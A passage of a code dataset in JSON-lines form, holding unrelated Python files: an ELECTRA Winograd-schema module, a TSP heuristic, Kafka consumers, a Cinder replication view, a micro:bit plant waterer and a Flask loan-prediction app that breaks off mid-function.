stopping evaluation\r\nglobal_evalpush_limit = 150\r\n\r\n#: The time in nanoseconds that a program can evaluate before stopping, 0 means no time limit\r\nglobal_evalpush_time_limit = 0\r\n\r\n#: Maximum size of push programs and push code, as counted by points in the\r\n#: program. Also, the maximum size of code that can appear on the exec or\r\n#: code stacks. This is set during evolution, but also has a default value here\r\n#: for push executions that happen outside of evolution.\r\nglobal_max_points = 200\r\n","sub_path":"pyshgp/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"654250973","text":"from functools import reduce\nimport operator\nimport en_core_web_lg # python -m spacy download en_core_web_lg\nspnlp = en_core_web_lg.load()\nimport torch\nfrom fastai2.text.all import *\nfrom _utils.huggingface import HF_BaseTransform, HF_Model\n\n@delegates(but=[\"out_cols\"])\nclass WSCTrickTfm(HF_BaseTransform):\n\n def __init__(self, hf_dset, hf_toker, **kwargs):\n super().__init__(hf_dset, out_cols=['prefix', 'suffix', 'cands', 'cand_lens', 'label'], **kwargs)\n self.tokenizer = hf_toker\n self.tokenizer_config = hf_toker.pretrained_init_configuration\n\n def __getstate__(self):\n state = self.__dict__.copy()\n state['tokenizer'] = None\n return state\n\n def simple_encode(self, text):\n return self.tokenizer.convert_tokens_to_ids(self.tokenizer.tokenize(text))\n\n def __call__(self, sample):\n # get candidates that solve pronoun\n sentence = spnlp(sample['text'])\n noun_chunks = extended_noun_chunks(sentence)\n cand_spans = filter_noun_chunks(\n noun_chunks,\n exclude_pronouns=True,\n exclude_query=sample['span1_text'],\n exact_match=False,)\n cands = [str(span) for span in cand_spans]\n cands = list(set(cands)) # no repeated\n\n # get texts without target span\n target_start, target_end = sample['span2_index'], sample['span2_index']+len(sample['span2_text'].split())\n prefix = ' '.join(sample['text'].split()[:target_start])\n suffix = ' '.join(sample['text'].split()[target_end:])\n\n # tokenize\n sample['prefix'] = self.tokenizer.encode(prefix)[:-1] # no SEP\n sample['suffix'] = self.tokenizer.encode(suffix)[1:] # no CLS\n cands = [self.simple_encode(sample['span1_text'])] + [self.simple_encode(cand) for cand in cands]\n sample['cands'] = reduce(operator.add, cands, []) # flatten list, into a 1d token ids\n sample['cand_lens'] = [len(cand) for cand in cands]\n # sample already have 'label'\n\n return sample\n\ndef extended_noun_chunks(sentence):\n noun_chunks = {(np.start, np.end) for np in sentence.noun_chunks}\n np_start, cur_np = 0, 'NONE'\n for i, token in enumerate(sentence):\n np_type = token.pos_ if token.pos_ in {'NOUN', 'PROPN'} else 'NONE'\n if np_type != cur_np:\n if cur_np != 'NONE':\n noun_chunks.add((np_start, i))\n if np_type != 'NONE':\n np_start = i\n cur_np = np_type\n if cur_np != 'NONE':\n noun_chunks.add((np_start, len(sentence)))\n return [sentence[s:e] for (s, e) in sorted(noun_chunks)]\n\ndef filter_noun_chunks(chunks, exclude_pronouns=False, exclude_query=None, exact_match=False):\n if exclude_pronouns:\n chunks = [\n np for np in chunks if (\n np.lemma_ != '-PRON-'\n and not all(tok.pos_ == 'PRON' for tok in np)\n )\n ]\n\n if exclude_query is not None:\n excl_txt = [exclude_query.lower()]\n filtered_chunks = []\n for chunk in chunks:\n lower_chunk = chunk.text.lower()\n found = False\n for excl in excl_txt:\n if (\n (not exact_match and (lower_chunk in excl or excl in lower_chunk))\n or lower_chunk == excl\n ):\n found = True\n break\n if not found:\n filtered_chunks.append(chunk)\n chunks = filtered_chunks\n\n return chunks\n\nclass ELECTRAWSCTrickModel(nn.Module):\n def __init__(self, discriminator, pad_idx):\n super().__init__()\n self.model = discriminator\n self.pad_idx = pad_idx\n \n def forward(self, *xb):\n \"\"\"\n prefix: (B, L_p)\n suffix: (B, L_s)\n cands: (B, L_c)\n cand_lens: (B, L_cl)\n \"\"\"\n batch_size = xb[0].shape[0]\n\n all_scores = []\n n_cands = []\n for i in range(batch_size):\n # unpad\n prefix, suffix, cands, cand_lens = self.depad(xb[0][i]), self.depad(xb[1][i]), self.depad(xb[2][i]), self.depad(xb[3][i])\n # unpack and pad into (#candidate, max_len)\n cands = cands.split(cand_lens.tolist()) # split into list of tensors, ith has length of cand_lens[i]\n max_len = max(len(cand) for cand in cands) + len(prefix) + len(suffix)\n sents, masks = [], []\n for cand in cands:\n pad_len = max_len - len(prefix) - len(suffix) - len(cand)\n sents.append( torch.cat([prefix,cand,suffix,cand.new_full((pad_len,),self.pad_idx)]) )\n masks.append( torch.cat([cand.new_zeros(len(prefix)),cand.new_ones(len(cand)),cand.new_zeros(max_len-len(prefix)-len(cand))]) )\n sents = torch.stack(sents) # (#candidate, max_len)\n masks = torch.stack(masks) # (#candidate, max_len)\n # get discrimiator scores for each candidate\n logits = self.model(sents) # (#candidate, max_len)\n scores = (logits * masks).sum(dim=-1) # (#candidate,)\n scores = scores / masks.sum(dim=-1)\n # save\n all_scores.append(scores)\n n_cands.append(scores.shape[0])\n # repack\n all_scores = torch.cat(all_scores) # (#total candidate in this batch,)\n n_cands = torch.tensor(n_cands, device=all_scores.device) # (B,)\n return all_scores, n_cands\n\n def depad(self, tensor):\n mask = tensor != self.pad_idx\n return tensor.masked_select(mask)\n\ndef wsc_trick_predict(preds):\n \"\"\"\n all_scores: (#total candidates in the dataset,)\n n_cands: (#samples in the dataset,)\n \"\"\"\n all_scores, n_cands = preds\n predicted = []\n for scores in all_scores.split(n_cands.tolist()):\n query_score = scores[0]\n other_scores = scores[1:]\n predicted.append((query_score <= other_scores).all())\n return torch.stack(predicted).int()\n\nclass ELECTRAWSCTrickLoss():\n def __init__(self):\n self.criterion = nn.BCEWithLogitsLoss()\n \n def __call__(self, x, y):\n all_scores, n_cands = x\n all_labels = []\n for scores in all_scores.split(n_cands.tolist()):\n n_cand = len(scores)\n labels = scores.new_ones(n_cand)\n labels[0] = 0.\n all_labels.append(labels)\n all_labels = torch.cat(all_labels) # (#total candidate in this batch,)\n return self.criterion(all_scores, all_labels)\n\n def decodes(self, preds): return wsc_trick_predict(preds)\n\ndef accuracy_electra_wsc_trick(preds, targs):\n predicts = wsc_trick_predict(preds)\n return (predicts == targs).float().mean()\n\ndef wsc_trick_merge(outs):\n all_scores = torch.stack([out[0] for out in outs]).mean(dim=0)\n n_cands = outs[0][1]\n return all_scores, n_cands","sub_path":"_utils/wsc_trick.py","file_name":"wsc_trick.py","file_ext":"py","file_size_in_byte":6457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"267841506","text":"import numpy as np\n\nimport networkx as nx\n\nfrom garageofcode.nphard.tsp import TSPath\n\ndef get_random_graph(n, rate, directed=False):\n if directed:\n G = nx.DiGraph()\n else:\n G = nx.Graph()\n\n for i in range(n):\n G.add_node(i)\n\n for i in range(n):\n for j in range(i+1, n):\n if np.random.random() < rate:\n if directed:\n if np.random.random() < 0.5:\n G.add_edge(i, j)\n else:\n G.add_edge(j, i)\n else:\n G.add_edge(i, j)\n return G\n\ndef get_unsatisfied(tspath): # assumes 0/1 graph\n path = tspath.get_path()\n for u in path + [path[0]]:\n if tspath.D[u, tspath.G[u]]:\n return u\n return None\n\ndef rnr_cross(G, tspath):\n #tspath = TSPath(D=D)\n N = len(G)\n tspath.greedy_init()\n score = tspath.get_score()\n\n for i in range(10000):\n u = get_unsatisfied(tspath)\n if u is None:\n return \n\n nodes = set(G[u]) | {u}\n prev_G = {u: tspath.G[u] for u in tspath.G}\n singles = list(tspath.ruin(nodes))\n \n # recreate step\n tspath.recreate(singles)\n\n tspath.exhaust_crosses()\n\n new_score = tspath.get_score()\n if new_score <= score:\n score = new_score\n else:\n # reverse changes\n tspath.G = prev_G\n\n if tspath.get_pathlen() < N:\n print(\"i:\", i)\n print(\"u:\", u)\n print(\"G:\", tspath.G)\n raise RuntimeError(\"dropped nodes!\")\n #for u in range(N):\n # tspath.recreate(list(tspath.ruin([u])))\n\n\ndef main():\n N = 100\n rate = 0.1\n\n G = get_random_graph(N, rate)\n D = np.zeros([N, N])\n for i in range(N):\n for j in range(i):\n if j in G[i]:\n D[i, j] = 0\n else:\n D[i, j] = 1\n D = D + D.T\n\n tspath = TSPath(D=D)\n tspath.greedy_init()\n greedy_score = tspath.get_score()\n tspath.exhaust_crosses()\n cross_score = tspath.get_score()\n rnr_cross(G, tspath)\n rnr_score = tspath.get_score()\n\n print(\"Greedy score: {0:.1f}\".format(greedy_score))\n print(\"Cross score: {0:.1f}\".format(cross_score))\n print(\"RnR score: {0:.1f}\".format(rnr_score))\n\n\nif __name__ == '__main__':\n main()","sub_path":"garageofcode/nphard/hamiltonian.py","file_name":"hamiltonian.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"595621507","text":"# coding=utf-8\r\nfrom spillebrett import Spillebrett\r\nfrom celle import Celle\r\n#importerer de 2 klassene\r\n\r\ndef main():\r\n\r\n print(\"\")\r\n #2 inputs som spør bruker hvor stør de ønsker rutenettet\r\n inp1 = int(input(\"Hvor mange rader? (bortover): \"))\r\n inp2 = int(input(\"Hvor mange kolonner? (nedover): \"))\r\n #kaller opp klassen Spillebrett med de 2 inputtene som argument\r\n spill1 = Spillebrett(inp2, inp1)\r\n\r\n #tom input, for å ikke spørre brukeren om noe før while-løkken har kjørt\r\n inp = \"\"\r\n\r\n #mens inp ^ (og inne i løkken) ikke er Q, kjøres koden\r\n while inp != \"q\":\r\n #stor linjeskift\r\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\r\n\r\n #lager en border rundt rutenettet på lengden til radene\r\n border = \"\"\r\n for x in range(inp1):\r\n border += \"---\"\r\n print(border)\r\n\r\n #kaller opp objektet med 2 metoder som tegner rutenettet, og deretter oppdateren den\r\n spill1.tegnBrett()\r\n spill1.oppdatering()\r\n\r\n #Antall levende celler blir printet ut vha metoden \"finnAntallLevende()\"\r\n print(\"Antall levende celler: \", spill1.finnAntallLevende())\r\n print(border)\r\n\r\n #input som spør brukeren om de vil avslutte eller fortsette - henger sammen med while-løkken\r\n inp = input(\"Press enter for å fortsette. Skriv in q og trykk enter for å avslutte: \")\r\n\r\n# starter hovedprogrammet\r\nmain()","sub_path":"innlevering8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"546838421","text":"from microbit import *\r\ndrop = Image(\"00900:\"\r\n \"09590:\"\r\n \"95559:\"\r\n \"95559:\"\r\n \"09990\")\r\ndispenseCount = 0\r\nwhile True:\r\n reading = pin0.read_analog()\r\n if (reading < 800):\r\n display.show(drop)\r\n pin1.write_digital(1)\r\n sleep(2000)\r\n pin1.write_digital(0)\r\n sleep(10000)\r\n dispenseCount += 1\r\n display.scroll(\"Water count \")\r\n display.scroll(str(dispenseCount))","sub_path":"AutoPlantWaterer.py","file_name":"AutoPlantWaterer.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"91717269","text":"# -*- python -*-\r\n# -*- coding: utf-8 -*-\r\n#\r\n# IdDict : container package\r\n#\r\n# Copyright or Copr. 2006 INRIA - CIRAD - INRA\r\n#\r\n# File author(s): Jerome Chopard \r\n#\r\n# Distributed under the Cecill-C License.\r\n# See accompanying file LICENSE.txt or copy at\r\n# http://www.cecill.info/licences/Licence_CeCILL-C_V1-en.html\r\n#\r\n# VPlants WebSite : https://gforge.inria.fr/projects/vplants/\r\n#\r\n\r\n__doc__=\"\"\"\r\nThis module provide a dictionnary that create keys when needed\r\n\"\"\"\r\n\r\n__license__= \"Cecill-C\"\r\n__revision__=\" $Id: id_dict.py 15635 2014-01-31 16:14:30Z boudon $ \"\r\n\r\nfrom id_generator import IdMaxGenerator,IdSetGenerator,IdListGenerator\r\n\r\nIdGen = {\"max\":IdMaxGenerator,\r\n \"set\":IdSetGenerator,\r\n \"list\":IdListGenerator}\r\n\r\nclass IdDict (dict) :\r\n \"\"\"\r\n store a tuple of (id,elm)\r\n create an id when needed\r\n \"\"\"\r\n def __init__ (self, *args, **kwdargs) :\r\n try :\r\n gen_name = kwdargs.pop(\"idgenerator\")\r\n except KeyError :\r\n gen_name = \"set\"\r\n dict.__init__(self,*args,**kwdargs)\r\n \r\n self._gen_id_generator(gen_name)\r\n \r\n for k,v in self.iteritems() :\r\n self._id_generator.get_id(k)\r\n\r\n def _gen_id_generator(self, gen_name = 'set'): \r\n try :\r\n self._id_generator=IdGen[gen_name]()\r\n except KeyError :\r\n raise UserWarning(\"the required id generator (%s) is unknown,\\navailable generator are %s\" % (gen_name,str(IdGen.keys())) )\r\n \r\n def add (self, val, key=None) :\r\n try :\r\n key=self._id_generator.get_id(key)\r\n dict.__setitem__(self,key,val)\r\n return key\r\n except IndexError :\r\n raise KeyError(key)\r\n\r\n def __deepcopy__(self, memo):\r\n from copy import deepcopy\r\n newval = IdDict()\r\n for key,val in self.iteritems():\r\n dict.__setitem__(newval,deepcopy(key,memo),deepcopy(val,memo))\r\n newval._id_generator = deepcopy(self._id_generator,memo)\r\n return newval\r\n ################################################\r\n #\r\n # dict interface\r\n #\r\n ################################################\r\n def __delitem__ (self, key) :\r\n dict.__delitem__(self,key)\r\n self._id_generator.release_id(key)\r\n\r\n def __setitem__ (self, key, val) :\r\n if key not in self :\r\n if not hasattr(self,'_id_generator') : self._gen_id_generator()\r\n self._id_generator.get_id(key)\r\n dict.__setitem__(self,key,val)\r\n\r\n def clear (self) :\r\n dict.clear(self)\r\n self._id_generator.clear()\r\n\r\n def copy (self) :\r\n return IdDict(self)\r\n\r\n def pop (self, key, *args) :\r\n try :\r\n val=dict.pop(self,key)\r\n self._id_generator.release_id(key)\r\n return val\r\n except KeyError :\r\n if len(args)>0 :\r\n return args[0]\r\n else :\r\n raise\r\n\r\n def popitem (self) :\r\n key,val=dict.popitem(self)\r\n self._id_generator.release_id(key)\r\n return key,val\r\n\r\n def setdefault (self, key, *args) :\r\n if key not in self :\r\n self._id_generator.get_id(key)\r\n return dict.setdefault(key,*args)\r\n\r\n def update (self, E, **F) :\r\n raise NotImplementedError(\"lapin compris\")\r\n","sub_path":"Openalea/CPIBOpenAlea/sa_oa/container/utils/id_dict.py","file_name":"id_dict.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"292615270","text":"# Copyright 2013 IBM Corp.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom cinder.api import common\nfrom cinder.openstack.common import log as logging\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass ViewBuilder(common.ViewBuilder):\n \"\"\"Model volume replication API responses as a python dictionary.\"\"\"\n\n _collection_name = \"os-volume-replication\"\n\n def __init__(self):\n \"\"\"Initialize view builder.\"\"\"\n super(ViewBuilder, self).__init__()\n\n def summary_list(self, request, replications):\n \"\"\"Show a list of replications without many details.\"\"\"\n return self._list_view(self.summary, request, replications)\n\n def detail_list(self, request, replications):\n \"\"\"Detailed view of a list of replications .\"\"\"\n return self._list_view(self.detail, request, replications)\n\n def summary(self, request, relationship):\n \"\"\"Generic, non-detailed view of a relationship.\"\"\"\n return {\n 'relationship': {\n 'id': relationship['id'],\n 'primary_id': relationship['primary_id'],\n 'status': relationship['status'],\n 'links': self._get_links(request,\n relationship['id']),\n },\n }\n\n def detail(self, request, relationship):\n \"\"\"Detailed view of a single relationship.\"\"\"\n return {\n 'relationship': {\n 'id': relationship['id'],\n 'primary_id': relationship['primary_id'],\n 'secondary_id': relationship['secondary_id'],\n 'status': relationship['status'],\n 'extended_status': relationship['extended_status'],\n 'links': self._get_links(request, relationship['id']),\n }\n }\n\n def _list_view(self, func, request, relationships):\n \"\"\"Provide a view for a list of relationships.\"\"\"\n r_list = [func(request, rel)['relationship'] for rel in\n relationships]\n r_links = self._get_collection_links(request, relationships,\n self._collection_name)\n r_dict = dict(relationships=r_list)\n\n if r_links:\n r_dict['relationships_links'] = r_links\n\n return r_dict\n","sub_path":"cinder/api/views/replications.py","file_name":"replications.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"508331752","text":"from lesson_unittest_support import KarmaLessonTestCase\nimport time\n\nclass Test(KarmaLessonTestCase):\n def select_option(self, i):\n locator = '//div[@id=\\'optionSection\\']/div[%s]' % i\n self.selenium.click(locator);\n time.sleep(1)\n\n def test_test(self):\n self.selenium.open(self.url)\n correct_options = [3, 1, 4, 1, 3, 2, 4]\n for option in correct_options:\n self.select_option(option)\n self.assertTrue(self.selenium.is_visible('//div[@id=\\'gameOver\\']'))\n\n def test_wrong(self):\n import os\n self.selenium.open(self.url)\n self.select_option(1)\n self.assertTrue(self.selenium.is_visible('//div[@id=\\'listenAgain\\']'))\n self.assertScreenshotEquals('wrong.png')\n","sub_path":"lessons/identification-animals/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"522888909","text":"__author__ = 'MG'\n\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n# 更改了树的结构,不建议这种方法\nclass Solution(object):\n def rob(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if root == None:\n return 0\n\n self.robHelp(root)\n\n return root.val\n\n\n def robHelp(self, root):\n if root == None:\n return 0\n\n root.val += self.robHelp(root.left) + self.robHelp(root.right)\n\n pre = 0\n if root.left != None:\n pre += root.left.val\n\n if root.right != None:\n pre += root.right.val\n\n root.val = max(pre,root.val)\n\n return pre\n","sub_path":"LeetCode/HouseRobberIII.py","file_name":"HouseRobberIII.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"200785323","text":"from QuickPotato.configuration.management import options\nfrom QuickPotato.database.schemas import RawStatisticsSchemas, UnitPerformanceTestResultSchemas\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import ProgrammingError\nfrom QuickPotato.utilities.exceptions import DatabaseConnectionCannotBeSpawned, DatabaseSchemaCannotBeSpawned\nfrom sqlalchemy_utils import database_exists, create_database, drop_database\nimport tempfile\n\n\nclass ContextManager(RawStatisticsSchemas, UnitPerformanceTestResultSchemas):\n\n URL = options.connection_url\n\n def __init__(self):\n RawStatisticsSchemas.__init__(self)\n UnitPerformanceTestResultSchemas.__init__(self)\n\n def spawn_engine(self, database_name):\n \"\"\"\n :return:\n \"\"\"\n try:\n url = self._validate_connection_url(database_name=database_name)\n engine = create_engine(url, echo=options.enable_database_echo)\n return engine\n\n except Exception:\n raise DatabaseConnectionCannotBeSpawned()\n\n def spawn_connection(self, database_name):\n \"\"\"\n\n :param database_name:\n :return:\n \"\"\"\n try:\n engine = self.spawn_engine(database_name)\n return engine, engine.connect()\n\n except Exception:\n raise DatabaseConnectionCannotBeSpawned()\n\n @staticmethod\n def close_connection(engine, connection):\n \"\"\"\n\n :param engine:\n :param connection:\n :return:\n \"\"\"\n connection.close()\n engine.dispose()\n return True\n\n @staticmethod\n def execute_query(connection, query):\n \"\"\"\n\n :param connection:\n :param query:\n :return:\n \"\"\"\n return connection.execute(query)\n\n def create_schema(self, database, schema):\n \"\"\"\n\n :param database:\n :param schema:\n :return:\n \"\"\"\n engine = self.spawn_engine(database)\n schema.metadata.create_all(engine)\n engine.dispose()\n return True\n\n def create_database(self, database_name):\n \"\"\"\n\n :param database_name:\n :return:\n \"\"\"\n try:\n # Add check for SQLite\n engine = self.spawn_engine(database_name)\n if not database_exists(engine.url):\n create_database(engine.url)\n engine.dispose()\n\n except ProgrammingError:\n # Database exists no need to re-create it\n pass\n\n except Exception:\n raise DatabaseSchemaCannotBeSpawned()\n\n def delete_database(self, database_name):\n \"\"\"\n\n :param database_name:\n :return:\n \"\"\"\n engine = self.spawn_engine(database_name)\n if database_exists(engine.url):\n drop_database(engine.url)\n return True\n\n def _validate_connection_url(self, database_name):\n \"\"\"\n :return:\n \"\"\"\n if self.URL is None:\n path = tempfile.gettempdir()\n path = path + \"\\\\\" if '\\\\' in path else path + \"/\"\n return \"sqlite:///\" + path + database_name + \".db\"\n\n elif options.connection_url.startswith('sqlite'):\n return self.URL + database_name + \".db\"\n\n else:\n return f\"{self.URL}/{database_name}\"\n","sub_path":"QuickPotato/database/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"579513276","text":"#! python3\r\n# mapIt.py - Launches a map in the browser using an address from the command line or clipboard.\r\nimport webbrowser, sys, pyperclip\r\n\r\n# from command line just put \"mapit \"address\"\"\r\nif len(sys.argv) > 1:\r\n # Get address from command line. all but the 1st elem is concatenated\r\n address = ' '.join(sys.argv[1:])\r\nelse:\r\n address = pyperclip.paste\r\nwebbrowser.open(\"https://www.google.com/maps/place/{}\".format(address))\r\n","sub_path":"Projects/Cool scripts/Mapit.py","file_name":"Mapit.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"36225758","text":"#!/usr/bin/env python\n#coding: utf-8\nimport threading, logging, time, sys\nfrom kafka import KafkaConsumer\nfrom pykafka import KafkaClient\n\n\"\"\"\nBalancedConsumer.consume获取消息类型[pykafka.protocol.Message]:\n \"compression_type\",\n \"partition_key\",\n \"value\",\n \"offset\",\n \"partition_id\",\n \"partition\",\n \"produce_attempt\",\n \"delivery_report_q\"\n\"\"\"\n\nclass PYKafkaConsumer(threading.Thread):\n daemon = True\n\n def __init__(self, name):\n threading.Thread.__init__(self)\n self.name = name\n\n def run(self):\n print >> sys.stderr, \"pykafka consumer runing\"\n client = KafkaClient(hosts=\"172.16.20.25:9092,172.16.20.25:9093,172.16.20.25:9094\")\n print >> sys.stderr, client.topics\n topic = client.topics['cluster_test']\n print >> sys.stderr, topic\n balanced_consumer = topic.get_balanced_consumer(consumer_group='consumerTest', auto_commit_enable=True, zookeeper_connect=\"172.16.20.25:2181, 172.16.20.26:2181\", auto_commit_interval_ms=1000) # 默认为60 * 1000\n print >> sys.stderr, \"consumer subscribe\"\n while True:\n #print >> sys.stderr, \"offset: \", consumer.offsets(group=\"consumerTest\")\n message = balanced_consumer.consume()\n #print >> sys.stderr, type(message)\n print >> sys.stderr, message.value\n #print >> sys.stderr, message\n\nclass KafkaConsumerTest(threading.Thread):\n daemon = True\n\n def __init__(self, name):\n threading.Thread.__init__(self)\n self.name = name\n\n def run(self):\n print >> sys.stderr, \"consumer runing\"\n consumer = KafkaConsumer(bootstrap_servers=(\"localhost:9092\",\"localhost:9093\",\"localhost:9094\"), client_id=\"kafkaConsumerTest\", group_id=\"consumerTest\", auto_offset_reset='latest')\n #consumer = KafkaConsumer(bootstrap_servers=\"localhost:9092\", auto_offset_reset='earliest')\n consumer.subscribe([\"cluster_test\"])\n print >> sys.stderr, \"consumer subscribe\"\n for message in consumer:\n #print >> sys.stderr, \"offset: \", consumer.offsets(group=\"consumerTest\")\n print >> sys.stderr, message\n\nif __name__ == \"__main__\":\n logging.basicConfig(format='%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s', level=logging.INFO)\n mth = KafkaConsumerTest(\"consumer\")\n mth.start()\n time.sleep(3600)\n #mth.join()\n","sub_path":"project/kafka/example/python/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"173690376","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2017年5月16日\n\n@author: MJ\n\"\"\"\nfrom __future__ import absolute_import\nimport os\nimport sys\np = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nif p not in sys.path:\n sys.path.append(p)\nimport numpy as np\nfrom word2vec.word2vec_by_gensim_utils import get_word_2_vec_by_gensim_for_sogou_classification\nfrom constant import MAX_DOCUMENT_LENGTH\n\n\ndef default_tokenizer():\n return lambda x: x.split()\n\n\nclass SimpleTextConverter(object):\n\n def __init__(self, word_vec, max_document_length, tokenizer_fn=None):\n self.syn0norm = word_vec.syn0norm\n self.vocab = word_vec.vocab\n self.tokenizer_fn = tokenizer_fn or default_tokenizer()\n\n self.max_document_length = max_document_length\n\n def transform_to_ids(self, raw_documents):\n for text in raw_documents:\n tokens = self.tokenizer_fn(text)\n word_ids = np.zeros(self.max_document_length, np.int64)\n\n idx = 0\n for token in tokens:\n if token not in self.vocab:\n continue\n if idx >= self.max_document_length:\n break\n word_ids[idx] = self.vocab[token].index\n idx += 1\n yield word_ids, idx\n\n\ntext_converter_for_sogou_classification = None\n\n\ndef get_text_converter_for_sogou_classification(max_document_length=MAX_DOCUMENT_LENGTH, tokenizer_fn=None):\n \"\"\"\n 由于使用全局变量, 第一次初始化后tokenizer_fn不可更新\n \"\"\"\n global text_converter_for_sogou_classification\n if not text_converter_for_sogou_classification:\n word_vec = get_word_2_vec_by_gensim_for_sogou_classification()\n text_converter_for_sogou_classification = SimpleTextConverter(word_vec, max_document_length, tokenizer_fn)\n return text_converter_for_sogou_classification\n","sub_path":"word2vec/data_convert.py","file_name":"data_convert.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"501357470","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport numpy as np\nfrom simulator.instance import Instance\nfrom solver.antennaLocation import AntennaLocation\nfrom tqdm import tqdm\n\nif __name__ == '__main__':\n # Parameters\n time_limit = 2 * 60 * 60 # maximum execution time in seconds\n output_file = \"./results/exp_general_table_ratio_NxN.csv\" # output file\n seeds_number = 10 # Number of seeds\n row_min = 3 # Minimum number of rows\n row_max = 10 # Maximum number of rows\n\n log_name = \"./logs/main.log\"\n logging.basicConfig(filename=log_name, format='%(asctime)s %(levelname)s: %(message)s', level=logging.INFO, datefmt=\"%H:%M:%S\", filemode='w')\n fp = open(\"./etc/config.json\", 'r')\n sim_setting = json.load(fp)\n fp.close()\n\n for row in tqdm(range(row_min, row_max)):\n for seed in range(seeds_number):\n for demand in range(sim_setting['max_capacity']):\n np.random.seed(seed)\n sim_setting['max_demand'] = demand+1\n sim_setting['min_demand'] = demand+1\n sim_setting['antenna_row'] = row\n sim_setting['antenna_column'] = row\n\n inst = Instance(sim_setting)\n dict_data = inst.get_data()\n\n prb = AntennaLocation(dict_data)\n\n # Solver\n of_exact, sol_exact, sol_q, comp_time_exact, flagSolver = prb.solve(dict_data, verbose=False, time_limit=time_limit)\n\n file_output = open(output_file, \"a\")\n file_output.write(f\"{seed},{sim_setting['antenna_row']},{sim_setting['antenna_column']},{sim_setting['max_capacity']},{sim_setting['min_capacity']},{sim_setting['max_demand']},{sim_setting['min_demand']},{sim_setting['max_cost']},{sim_setting['min_cost']},{'solver'},{sim_setting['max_demand']/sim_setting['max_capacity']},{comp_time_exact},{of_exact},{flagSolver}\\n\")\n file_output.close()","sub_path":"mainIterRatio.py","file_name":"mainIterRatio.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"407825731","text":"from flask import Flask,render_template,url_for,request\nimport pandas as pd\nimport pickle\n\n\napp=Flask(__name__)\n\n@app.route('/')\n\ndef home():\n return render_template('index.html')\n\n@app.route('/result',methods=['POST'])\ndef predict():\n # Getting the data from the form\n loan_amnt=request.form['loan_amnt']\n term=request.form['term']\n int_rate=request.form['int_rate']\n emp_length=request.form['emp_length']\n home_ownership=request.form['home_ownership']\n annual_inc=request.form['annual_inc']\n purpose=request.form['purpose']\n dti=request.form['dti']\n delinq_2yrs=request.form['delinq_2yrs']\n revol_util=request.form['revol_util']\n total_acc=request.form['total_acc']\n longest_credit_length=request.form['longest_credit_length']\n verification_status=request.form['verification_status']\n # creating a json object to hold the data from the form\n input_data=[{\n 'loan_amnt':loan_amnt,\n 'term':term,\n 'int_rate':int_rate,\n 'emp_length':emp_length,\n 'home_ownership':home_ownership,\n 'annual_inc':annual_inc,\n 'purpose':purpose,\n 'dti':dti,\n 'delinq_2yrs':delinq_2yrs,\n 'revol_util':revol_util,\n 'total_acc':total_acc,\n 'longest_credit_length':longest_credit_length,\n 'verification_status':verification_status}]\n\n\n dataset=pd.DataFrame(input_data)\n\n dataset=dataset.rename(columns={\n 'loan_amnt':'loan_amnt',\n 'term':'term',\n 'int_rate':'int_rate',\n 'emp_length':'emp_length',\n 'home_ownership':'home_ownership',\n 'annual_inc':'annual_inc',\n 'purpose':'purpose',\n 'dti':'dti',\n 'delinq_2yrs':'delinq_2yrs',\n 'revol_util':'revol_util',\n 'total_acc':'total_acc',\n 'longest_credit_length':'longest_credit_length',\n 'verification_status':'verification_status'})\n\n dataset[['loan_amnt','int_rate','emp_length','annual_inc', 'dti', 'delinq_2yrs', 'revol_util', 